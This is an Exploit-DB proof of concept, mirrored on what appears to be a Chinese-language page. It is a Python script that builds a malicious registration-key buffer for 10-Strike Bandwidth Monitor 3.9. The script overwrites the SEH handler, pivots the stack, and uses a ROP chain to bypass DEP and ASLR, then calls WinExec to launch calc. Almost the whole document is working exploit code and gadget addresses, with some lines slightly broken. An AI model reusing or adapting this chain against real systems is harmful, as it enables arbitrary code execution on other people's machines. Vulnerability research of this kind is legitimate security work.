10-Strike Bandwidth Monitor 3.9 – Buffer Overflow (SEH) (ASLR + DEP Bypass)

  • 作者: boku
    日期: 2020-06-10
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/48570/
  • # Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR)
    # Exploit Author: Bobby Cooke
    # Date: 2020-07-07
    # Vendor Site: https://www.10-strike.com/
    # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
    # Tested On: Windows 10 - Pro 1909 (x86)
    # Version: version 3.9
    # Exploit Details:
    # 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
    # 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
    # - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
    # 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
    # 4. A pointer to the LoadLibraryA symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call LoadLibraryA and find the memory address of the [kernel.dll] module; as it is protected by ASLR and will be different every time the process runs.
    # 5. A pointer to the GetProcAddress symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call GetProcAddress to find the memory address of the WinExec Symbol within [kernel32.dll].
    # 6. Use Gadgets to call the WinExec Function and open calc.
    # - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
    # Recreate: 
    # Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
    # Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
    # Base | Top| Rebase | SafeSEH | ASLR| NXCompat | OS Dll | Modulename
    # -------------------------------------------------------------------------------------------
    # 0x12000000 | 0x12057000 | False| True| False |False | False| [ssleay32.dll]
    # 0x00400000 | 0x01247000 | False| False | False |False | False| [BandMonitor.exe]
    # 0x11000000 | 0x11155000 | False| True| False |False | False| [LIBEAY32.dll]
    # -------------------------------------------------------------------------------------------
    import struct
    OS_retSled = '\x41'*400
    retSled= '\x24\x01\x06\x11'*100 #11060124# retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
    def createRopChain():
    ropGadgets = [
    # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
    # $ ==> > 1106905DCALL to LoadLibraryA
    # $+4 > 012428B4FileName = "kernel32.dll"
    0x012126f5,# POP EAX # RETN [BandMonitor.exe] 
    0x110e70bc,# kernel32!loadlibrarya [LIBEAY32.dll] 
    0x110495ef,# JMP [EAX] [LIBEAY32.dll]
    0x1106905d,# PUSH EAX # POP ESI # RETN [LIBEAY32.dll] 
    0x012428B4,# &String = "kernel32.dll\x00"
    # EAX&ESI = &kernel32.dll
    # FARPROC GetProcAddress( HMODULE hModule, LPCSTRlpProcName);
    #$ ==>> 011D53D2CALL to GetProcAddress
    #$+4> 76C40000hModule = (KERNEL32)
    #$+8> 0014F6CCProcNameOrOrdinal = "WinExec"
    0x01226010,# PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx]
    0xfffff2D4,# EDX = Offset2String; ECX = ESP
    0x011d53d2,# xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00"
    0x11061ea7,# sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4"
    0x1106905d,# push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4"
     # (INC EAX # RETN)*7 [LIBEAY32.dll]
    0x011f282b,# xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00"
    0x01203a3b,# xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00"
    0x11084dca,# xchg eax, edx # ret [LIBEAY32.dll]- EDX="WinExec\x00"
    0x012126f5,# POP EAX # RETN [BandMonitor.exe] 
    0x110e708c,# kernel32!getprocaddress [LIBEAY32.dll]
    0x1109cdb9,# mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress
    0x1106CE04,# mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
    0x011d53d2,# xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec
    0xffffffff,# NOP - Overwritten by GetProcAddress Stack Setup
    0xffffffff,# NOP - Overwritten by GetProcAddress Stack Setup
    # Call WinExec( CmdLine, ShowState );
    # CmdLine = "calc"
    # ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
    0x0106a762,# INC ESI # RETN [BandMonitor.exe] - ESI="calc\x"
    0x01203a3b,# xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff"
    0x1106905d,# PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff"
    0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll]
    0x01226014,# POP EDX # RETN [BandMonitor.exe]
    0xffffffff,# dl = 0xff 
    0x011f282b,# xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00"
    0x01218952,# NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL
    0x01203a3b,# xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00"
    0x1102ce1f,# xchg eax, ecx[LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec
    0x1106CE04,# mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
    0x11060124 # retn [LIBEAY32.dll] - ROP NOP 
    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
    ropChain = createRopChain()
    OS_nSEH= '\x43'*(4188-len(OS_retSled+retSled+ropChain))
    nSEH = '\x44'*4
    # Stack pivot offset to controllable buffer: 1408 (0x580) bytes
    SEH= '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
    WinExec= '\x57\x69\x6e\x45' # WinE
    WinExec += '\x78\x65\x63\xd4' # xec.
    calc = '\x63\x61\x6c\x63' #calc
    calc+= '\xff\x42\x42\x42' #....
    extra= '\x44'*2000
    buffer= OS_retSled + retSled + ropChain + OS_nSEH + nSEH + SEH + WinExec + calc + extra
    File= 'poc.txt'
    payload = buffer
    f = open(File, 'w')
    print File + " created successfully"
    print File + ' failed to create'